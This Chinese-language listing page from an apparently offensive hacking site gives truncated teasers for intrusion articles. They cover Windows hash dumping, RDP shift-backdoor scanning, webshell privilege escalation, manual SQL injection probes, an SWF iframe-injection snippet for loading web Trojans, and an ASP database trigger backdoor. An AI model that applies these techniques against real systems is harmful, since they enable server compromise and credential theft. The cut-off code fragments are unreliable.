今天抓hash的时候发现GetHashes.exe不好使..另外又测试了几个也都不好用... 不同版本的Windows的hash获取方法不一样. 用到的工具有pwdump7.exe、GetHashes...
网络安全
网络安全
网络安全
CSRF的攻击方式详解 黑客必备知识
】:一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:...
3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]
首先3389的SHIFT后门极少 其次大部分SHIFT后门都加密 所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受 需要用到的工具 roboclientsmclient -f:shift_...
服务器 提权方法大全
现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但...
webshell 提权方法 服务器提权教程
一:首先检测一下网站的服务器是否开了 3389 远程终端 二:检测一下服务是否用了serv-u (还有是什么版本的) 方法 一:复制一个网站 用 3389 登陆器连接一下 (是否成功) 能连接了,拿下...
注入命令 手工注入命令大全
1.判断是否有注入;and 1=1 ;and 1=22.初步判断是否是mssql ;and user>03.注入参数是字符'and and ''='4.搜索时没过滤参数的'and and '%2...
网络安全
编辑器代码逃逸漏洞 by蚊虫原创
好 版权信息 把他变成小马 成功保存 但是没有被执行.. 应该是马的问题 马儿不行 当然是更换了 这不 怪事出现了 你看.. 看 命令成功完成! 非法操作! &nbs...
黑客常用词汇集 入门必看!
webshell 就是web上面的操作界面(shell),简单地说,webshell就是你上传到服务器的的大马文件. 拿站 如果一个网站被你控制了(拿到了webshell,或者被你用灰鸽子控制了,但一...
swf 调用网马代码
// Action script...var lcx= "var O = document.createElement(\"iframe\");O.src=\"...
MsSql 触发器后门asp版
复制代码代码如下:<%'里边的变量代码大家用时自己改吧On Error Resume nextSet conn=Server.CreateObject("ADODB.Connection") D...
